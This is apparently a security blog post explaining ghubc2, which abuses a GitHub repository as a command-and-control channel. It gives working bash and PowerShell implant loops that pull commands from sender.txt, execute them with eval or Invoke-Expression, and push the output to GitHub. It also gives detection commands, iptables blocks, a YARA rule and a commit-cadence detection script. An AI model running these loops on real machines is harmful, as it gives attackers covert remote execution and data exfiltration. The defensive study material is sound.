Using GitHub as a Command-and-Control (C2) Server with ghubc2

The tool ghubc2 demonstrates how GitHub can be abused as a Command-and-Control (C2) server for remote command execution: the script uses an ordinary GitHub repository to deliver commands to a compromised machine and to retrieve their output.

How It Works:

  1. Command Dispatch: The attacker updates `sender.txt` in the GitHub repo with a command.
  2. Victim Execution: The victim machine periodically checks `sender.txt`, executes the command, and uploads the output to `resver.txt`.
  3. Exfiltration: The attacker reads `resver.txt` to view command results.

GitHub Repository: ghubc2 GitHub Link

You Should Know:

  1. Setting Up a GitHub C2 (For Ethical Testing)
    # Clone the repository
    git clone https://github.com/attacker/repo.git
    cd repo

    # Create command and output files
    echo "whoami" > sender.txt
    touch resver.txt

    # Push to GitHub
    git add .
    git commit -m "Initial C2 setup"
    git push origin main
    

2. Simulating the Victim Machine (Linux)

    while true; do
        git pull origin main
        if [ -s sender.txt ]; then
            command=$(cat sender.txt)
            eval "$command" > resver.txt
            git add resver.txt
            git commit -m "Command output"
            git push origin main
            echo "" > sender.txt
            git add sender.txt
            git commit -m "Reset sender"
            git push origin main
        fi
        sleep 30
    done

3. Detecting GitHub C2 Activity (Defensive)

    # Monitor suspicious git processes (the [g] pattern keeps grep from matching itself;
    # the loop's git calls are short-lived, so sample repeatedly or log execve via auditd)
    ps aux | grep -i "[g]it pull"

    # Check cron jobs for automated git pulls
    crontab -l

    # Inspect established connections owned by git processes
    # (-l would list only listening sockets and miss the outbound HTTPS sessions)
    netstat -tnp | grep -i "git"

4. Windows Equivalent (PowerShell)

    while ($true) {
        git pull origin main
        if (Get-Content -Path "sender.txt" -ErrorAction SilentlyContinue) {
            $command = Get-Content -Path "sender.txt"
            Invoke-Expression $command | Out-File -FilePath "resver.txt"
            git add resver.txt
            git commit -m "Command output"
            git push origin main
            Clear-Content -Path "sender.txt"
            git add sender.txt
            git commit -m "Reset sender"
            git push origin main
        }
        Start-Sleep -Seconds 30
    }
  5. Blocking GitHub C2 in a Corporate Environment
    # Block GitHub domains via firewall
    iptables -A OUTPUT -p tcp -d github.com --dport 443 -j DROP
    iptables -A OUTPUT -p tcp -d githubusercontent.com --dport 443 -j DROP

    # Monitor for git-based exfiltration
    grep -r "git pull" /var/log/

    Note: iptables resolves a hostname only once, at rule-insertion time, and GitHub serves from many addresses, so these rules are brittle; a DNS filter or egress proxy that blocks the domains is the more reliable control.
    

What Undercode Say:

GitHub-based C2 attacks are stealthy because they blend in with legitimate traffic. Defenders must:
– Monitor automated `git` processes.
– Restrict outbound connections to GitHub in sensitive environments.
– Use YARA rules to detect malicious scripts.

Example YARA rule for ghubc2 detection:

    rule GitHub_C2 {
        strings:
            $git_pull = "git pull origin main"
            $sender_txt = "sender.txt"
            $resver_txt = "resver.txt"
        condition:
            all of them
    }
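The YARA rule above matches literal strings, so renaming the two files or the branch evades it. As an added defensive example (not part of the original post or the ghubc2 project), the following script applies the behavioural monitoring the post calls for to a repository's commit history: an automated loop leaves many small commits that touch the same one or two files with the same subjects at a near-constant interval. The log sample is constructed, the `%ct|%s` plus `--name-only` layout with one blank line between commits is an assumption of the parser, and the thresholds are illustrative.

```python
"""Behavioural check for ghubc2-style beaconing in a git history (added example)."""
from statistics import mean, pstdev

# Constructed sample (not real data), modelled on `git log --pretty=format:'%ct|%s' --name-only`
# with one blank line between commits, for a repo driven by a 30-second poll loop like the one above.
SAMPLE_LOG = """\
1700000031|Command output
resver.txt

1700000032|Reset sender
sender.txt

1700000061|Command output
resver.txt

1700000062|Reset sender
sender.txt

1700000091|Command output
resver.txt
"""

def parse_log(text):
    """Parse the log format above into (epoch, subject, frozenset(files)) tuples."""
    commits = []
    for block in text.strip().split("\n\n"):
        head, *files = block.strip().splitlines()
        epoch, _, subject = head.partition("|")
        commits.append((int(epoch), subject, frozenset(files)))
    return commits

def beacon_report(commits, min_commits=5, max_cv=0.2):
    """Signals of an automated loop: few distinct files and subjects, and a steady
    interval (low coefficient of variation) between commits touching the same files."""
    if len(commits) < min_commits:
        return {"suspicious": False, "reason": "too few commits"}
    files = frozenset().union(*(c[2] for c in commits))
    subjects = {c[1] for c in commits}
    by_fileset = {}
    for epoch, _, fs in commits:
        by_fileset.setdefault(fs, []).append(epoch)
    cadence = None  # lowest CV over any file set with at least two gaps
    for stamps in by_fileset.values():
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if len(gaps) >= 2 and mean(gaps) > 0:
            cv = pstdev(gaps) / mean(gaps)
            cadence = cv if cadence is None else min(cadence, cv)
    regular = cadence is not None and cadence <= max_cv
    return {"suspicious": len(files) <= 3 and len(subjects) <= 3 and regular,
            "files": sorted(files), "subjects": sorted(subjects), "cadence_cv": cadence}
```

Run it against `git log` output from repositories your organisation's hosts push to; a human-driven project shows many distinct files and irregular gaps, while the sample above reports `suspicious: True` with a cadence CV of 0.0.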

Expected Output:

A functioning GitHub C2 channel for red team exercises, or a detected and mitigated attack in defensive scenarios.

Prediction:

GitHub-based C2 attacks will rise due to their low detection rate. Enterprises will enforce stricter git access controls and behavioral monitoring to counter such threats.

Reported By: Mohamedshahat Shiky – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
